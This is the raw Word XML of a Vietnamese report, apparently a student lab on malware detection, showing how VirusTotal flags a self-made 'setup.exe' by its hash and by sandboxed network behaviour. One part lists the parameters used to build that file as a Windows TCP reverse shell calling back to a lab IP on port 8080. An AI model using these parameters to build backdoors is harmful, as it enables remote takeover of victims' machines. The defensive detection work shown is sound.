          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EE0876">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>+Phân tích: Sau khi tệp hoặc URL đã được tải lên, VirusTotal sẽ tiến hành phân tích bằng nhiều công cụ và trình quét khác nhau. Công cụ này sẽ quét tệp để tìm các dấu hiệu của mã độc, virus, malware, hoặc bất kỳ phần mềm độc hại nào.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1671C97F" w14:textId="7CD1AB4B" w:rsidR="00C41018" w:rsidRPr="00EA0FA7" w:rsidRDefault="00000000" w:rsidP="00B24CA2">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:spacing w:line="28" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EE0876">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>+So sánh với cơ sở dữ liệu: VirusTotal sẽ so sánh kết quả của quét với cơ sở dữ liệu của nhiều công ty an ninh và nhà cung cấp phần mềm diệt virus khác nhau. Cơ sở dữ liệu này chứa thông tin về chữ ký mã độc từ hàng trăm nghìn phần mềm diệt virus.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="454E2001" w14:textId="28231695" w:rsidR="00C41018" w:rsidRPr="00EA0FA7" w:rsidRDefault="00000000" w:rsidP="00B24CA2">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:spacing w:line="28" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EE0876">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>+Kết quả: Sau khi quá trình phân tích và so sánh hoàn tất, VirusTotal sẽ hiển thị kết quả kiểm tra. Kết quả này sẽ cho biết liệu tệp hoặc URL có chứa mã độc hay không. Nếu có, VirusTotal sẽ cung cấp thông tin chi tiết về các chữ ký và những công cụ phát hiện mã độc nào đã phát hiện.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="612EB242" w14:textId="6EBE4397" w:rsidR="00C41018" w:rsidRPr="00EE0876" w:rsidRDefault="00000000" w:rsidP="00B24CA2">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:spacing w:line="28" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EE0876">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>+Thống kê: VirusTotal cung cấp các thống kê về kết quả kiểm tra, bao gồm tỷ lệ phần mềm diệt virus phát hiện và không phát hiện mã độc. Người dùng có thể xem thông tin chi tiết về kết quả để hiểu hơn về tệp hoặc URL kiểm tra.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6ACC6959"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Trong trường hợp cụ thể này , chữ ký của file “setup.exe” sẽ được tự động tính toán theo các thuật toán hash theo thẻ “DETAILS” trên giao diện web:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EF27D7C" w14:textId="0C39E8A0" w:rsidR="00C41018" w:rsidRPr="00EE0876" w:rsidRDefault="00C41018" w:rsidP="00B24CA2">
      <w:pPr>
        <w:spacing w:line="28" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="77C4C527" w14:textId="1EECD6B6" w:rsidR="00C41018" w:rsidRPr="00EE0876" w:rsidRDefault="00234F56" w:rsidP="00B24CA2">
      <w:pPr>
        <w:spacing w:line="28" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>S</w:t>
      </w:r>
      <w:r w:rsidRPr="00EE0876">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">au đó công cụ này sẽ tự động tìm kiếm chuỗi hash SHA-256 từ mẫu mã độc và tìm kiếm trong cơ sở dữ liệu , nếu chuỗi hash này trùng với chuỗi hash nào có trong cơ sở dữ liệu thì sẽ </w:t>
      </w:r>
      <w:r w:rsidRPr="00EE0876">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>xác định file được upload lên đó là mã độc mà thông báo lại với người dùng.So sánh lại với chuỗi hash được tính toán trước đó:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52CC5178"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618E0BAC" wp14:editId="21629E6D">
            <wp:extent cx="5731200" cy="469900"/>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731200" cy="469900"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="035E3C71"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như vậy hai phần hash của ta tự tính toán trùng với phần hash của virustotal tính toán.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51417857"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gt;Kết quả:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57B291C6"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5F648660" wp14:editId="2E83F55B">
            <wp:extent cx="5731200" cy="20701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31200" cy="2070100"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="788F2F8B" w14:textId="0A233261" w:rsidR="00C41018" w:rsidRPr="009D110C" w:rsidRDefault="00000000" w:rsidP="00B24CA2">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="0" w:after="0" w:line="28" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="60" w:name="_Toc150717785"/>
      <w:bookmarkStart w:id="61" w:name="_Toc150718047"/>
      <w:bookmarkStart w:id="62" w:name="_Toc150718134"/>
      <w:r w:rsidRPr="00EE0876">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>2.Phân tích hành vi (Behavior)</w:t>
      </w:r>
      <w:r w:rsidR="009D110C">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="60"/>
      <w:bookmarkEnd w:id="61"/>
      <w:bookmarkEnd w:id="62"/>
    </w:p>
    <w:p w14:paraId="281FE6CD"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Quá trình phân tích hành vi trên VirusTotal diễn ra bằng cách sử dụng các công cụ đánh giá hành vi của tệp hoặc ứng dụng. Dưới đây là cách VirusTotal thực hiện quá trình này:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1733889A" w14:textId="392C08F8" w:rsidR="00C41018" w:rsidRPr="00CC3C04" w:rsidRDefault="00000000" w:rsidP="00B24CA2">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:spacing w:line="28" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EE0876">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>+Gửi tệp hoặc URL: Người dùng tải lên tệp hoặc cung cấp URL của tệp cần kiểm tra, tương tự như trong quá trình kiểm tra chữ ký mã độc.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0441745B" w14:textId="5B734DEC" w:rsidR="00C41018" w:rsidRPr="00CC3C04" w:rsidRDefault="00000000" w:rsidP="00B24CA2">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:spacing w:line="28" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EE0876">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>+Phân tích tĩnh: Sau khi tệp hoặc URL được tải lên, VirusTotal sẽ thực hiện phân tích tĩnh. Điều này bao gồm việc kiểm tra các thuộc tính của tệp, như mã nguồn, phân đoạn, tệp thực thi, cấu trúc tệp, và các tệp liên quan khác. VirusTotal sử dụng các công cụ để phát hiện các dấu hiệu và hành vi không bình thường trong tệp.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1136FA30" w14:textId="119F59C3" w:rsidR="00C41018" w:rsidRPr="00CC3C04" w:rsidRDefault="00000000" w:rsidP="00B24CA2">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:spacing w:line="28" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EE0876">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>+Phân tích động: Ngoài phân tích tĩnh, VirusTotal còn thực hiện phân tích động bằng cách chạy tệp hoặc ứng dụng trong một môi trường cách ly. Trong quá trình này, VirusTotal theo dõi các hoạt động của tệp hoặc ứng dụng, bao gồm giao tiếp mạng, tạo và sửa đổi tệp, giao tiếp với hệ thống và nhiều hoạt động khác. VirusTotal sử dụng các công cụ giám sát hành vi để theo dõi các hoạt động này.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0756F12A" w14:textId="66E5AC7D" w:rsidR="00C41018" w:rsidRPr="00CC3C04" w:rsidRDefault="00000000" w:rsidP="00B24CA2">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:spacing w:line="28" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EE0876">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>+Xác định hành vi đáng ngờ: VirusTotal so sánh kết quả của phân tích tĩnh và động với các mẫu hành vi đã biết đến và xác định xem có hành vi đáng ngờ nào không. Nếu có, nó sẽ ghi lại các thông tin về hành vi đó.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05833682" w14:textId="70031EE1" w:rsidR="00C41018" w:rsidRDefault="00000000" w:rsidP="00B24CA2">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:spacing w:line="28" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EE0876">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>+Kết quả và báo cáo: VirusTotal cung cấp kết quả phân tích hành vi dưới dạng báo cáo. Báo cáo này có thể chứa thông tin về các hành vi đáng ngờ, tương tác mạng, các tệp hoặc thư mục được tạo ra hoặc chỉnh sửa bởi ứng dụng, và nhiều thông tin khác. Người dùng có thể xem báo cáo để đánh giá tính an toàn của tệp hoặc ứng dụng.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AE38433" w14:textId="77777777" w:rsidR="00CC3C04" w:rsidRPr="00CC3C04" w:rsidRDefault="00CC3C04" w:rsidP="00B24CA2">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:spacing w:line="28" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="15CEBE05"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Quay lại quá trình tạo mã độc:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="375C8069"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17686DCA" wp14:editId="1C48AE09">
            <wp:extent cx="5731200" cy="9271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927100"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="72B717A1" w14:textId="1C29A193"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giải thích các tham số:</w:t>
      </w:r>
      <w:r w:rsidRPr="00EE0876">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00EE0876">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:tab/>
        <w:t>+LHOST=192.168.10.136 : là tham số chỉ định IP của máy lắng nghe (hoặc máy tấn công)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7512735F" w14:textId="0428574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lastRenderedPageBreak/>
        <w:tab/>
        <w:t>+LPORT=</w:t>
      </w:r>
      <w:r w:rsidR="004C1AA4" w:rsidRPr="00EE0876">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00EE0876">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>8080 : là tham số chỉ định PORT của máy lắng nghe (hoặc máy tấn công)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FE0F554" w14:textId="1AA8EE3A"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windows/shell_reverse_tcp : payload sử dụng cho mã độc này , ở đây là payload sử dụng để nhắm vào hệ điều hành windows và ở dạng reverse-shell dựa trên giao thức tcp</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54306E0F" w14:textId="5DC7D9B8"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f exe : chỉ định định dạng của file mã độc</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60FB076B" w14:textId="56F85FF4"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ab/>
        <w:t>+- o setup.exe : chỉ định đầu ra</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19588923" w14:textId="77777777" w:rsidR="00C41018" w:rsidRPr="00EE0876" w:rsidRDefault="00C41018" w:rsidP="00B24CA2">
      <w:pPr>
        <w:spacing w:line="28" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="16B772C2" w14:textId="1185F400"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gt;Theo cách giải thích đó thì cơ bản ta sẽ tạo một file thực thi có tác dụng là thực hiện một reverse-shell khiến máy nạn nhân sẽ tự động kết nối tới port lắng nghe của máy tấn công khi thực thi file này , tại máy tấn công ta sẽ có một phiên CMD trên máy nạn nhân.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16BA3A72"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 xml:space="preserve">-Dựa trên giải thích trên , khi thực thi file “setup.exe” , hệ thống sẽ phải kết nối tới IP của kẻ tấn công , Virustotal cũng sẽ phân tích hành vi này của mã độc dựa trên phân tích hành vi bằng cách chạy tệp này trong một môi trường cách ly và sau đó sẽ ghi lại lưu lượng mạng và từ đó phát hiện ra IP của kẻ tấn công.Kết quả của quá trình phân tích này sẽ được ghi lại trong 2 tab “RELATIONS” : </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0160E336"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2B4945F8" wp14:editId="350E0580">
            <wp:extent cx="5731200" cy="32258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731200" cy="3225800"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CF94024"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và “BEHAVIOR”:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="011EA7C2"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75F5C122" wp14:editId="6FFF3A0C">
            <wp:extent cx="5731200" cy="1612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731200" cy="1612900"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="1016741A"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gt;Kết quả : xác định được IP của máy tấn công 192.168.10.136</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4870CCE2" w14:textId="77777777" w:rsidR="00C41018" w:rsidRPr="00EE0876" w:rsidRDefault="00C41018" w:rsidP="00B24CA2">
      <w:pPr>
        <w:spacing w:line="28" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2A70CB5D"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Ngoài việc kiểm tra lưu lượng mạng khi chạy file “setup.exe” , công cụ này cũng sẽ ghi lại các thư viện mà tiến trình này sử dụng khi chạy , trong đó bao gồm các thư viện mà ta đã xác định dựa trên phân tích tĩnh trước đó:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44367511" w14:textId="77777777" w:rsidR="00C41018" w:rsidRDefault="00000000" w:rsidP="00B24CA2">
      <w:pPr>
        <w:spacing w:line="28" w:lineRule="atLeast"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EE0876">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="114300" distB="114300" distL="114300" distR="114300" wp14:anchorId="2D62D293" wp14:editId="433520C0">
            <wp:extent cx="4371975" cy="440055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4371975" cy="4400550"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B39DF7B" w14:textId="77777777" w:rsidR="001C6BBB" w:rsidRPr="00EE0876" w:rsidRDefault="001C6BBB" w:rsidP="00B24CA2">
      <w:pPr>
        <w:spacing w:line="28" w:lineRule="atLeast"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7835F58C" w14:textId="77777777" w:rsidR="00C41018" w:rsidRPr="00EE0876" w:rsidRDefault="00000000" w:rsidP="00B24CA2">
      <w:pPr>
        <w:spacing w:line="28" w:lineRule="atLeast"/>
        <w:jc w:val="center"/>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68364D4C" wp14:editId="6EA338A4">
            <wp:extent cx="4198620" cy="1574800"/>
            <wp:effectExtent l="0" t="0" r="0" b="635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8"/>
                    <a:srcRect b="13879"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4199100" cy="1574980"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                    <a:extLst>
                      <a:ext uri="{53640926-AAD7-44D8-BBD7-CCE9431645EC}">
                        <a14:shadowObscured xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main"/>
                      </a:ext>
                    </a:extLst>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="4919FD09" w14:textId="77777777" w:rsidR="00C41018" w:rsidRPr="00EE0876"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sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>đồng thời cũng xác định các tiến trình mới được tạo ra trong quá trình chạy “setup.exe”:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="050D21CF" w14:textId="77777777" w:rsidR="00C41018" w:rsidRDefault="00000000" w:rsidP="00B24CA2">
      <w:pPr>
        <w:spacing w:line="28" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EE0876">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="114300" distB="114300" distL="114300" distR="114300" wp14:anchorId="6E5DA76C" wp14:editId="19ECC6A9">
            <wp:extent cx="5731200" cy="1752600"/>
            <wp:effectExtent l="0" t="0" r="0"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5731200" cy="1752600"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="3448BCF2" w14:textId="29195A5A" w:rsidR="00913E01" w:rsidRPr="009C6F75" w:rsidRDefault="00913E01" w:rsidP="00B24CA2">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:before="0" w:after="0" w:line="28" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="Times New Roman" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F1F1F"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="63" w:name="_Toc150717786"/>
      <w:bookmarkStart w:id="64" w:name="_Toc150718048"/>
      <w:bookmarkStart w:id="65" w:name="_Toc150718135"/>
      <w:r w:rsidRPr="009C6F75">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="Times New Roman" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F1F1F"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>VI. So sánh VirusTotal và YARA</w:t>
      </w:r>
      <w:r w:rsidR="009C6F75" w:rsidRPr="009C6F75">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="Times New Roman" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F1F1F"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="63"/>
      <w:bookmarkEnd w:id="64"/>
      <w:bookmarkEnd w:id="65"/>
    </w:p>
    <w:p w14:paraId="0EA4BF1F" w14:textId="60F1B8BB" w:rsidR="00154862" w:rsidRPr="00154862" w:rsidRDefault="00154862" w:rsidP="00B24CA2">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:line="28" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="Times New Roman" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:color w:val="1F1F1F"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00154862">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="Times New Roman" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:color w:val="1F1F1F"/>
          <w:sz w:val="24"/>
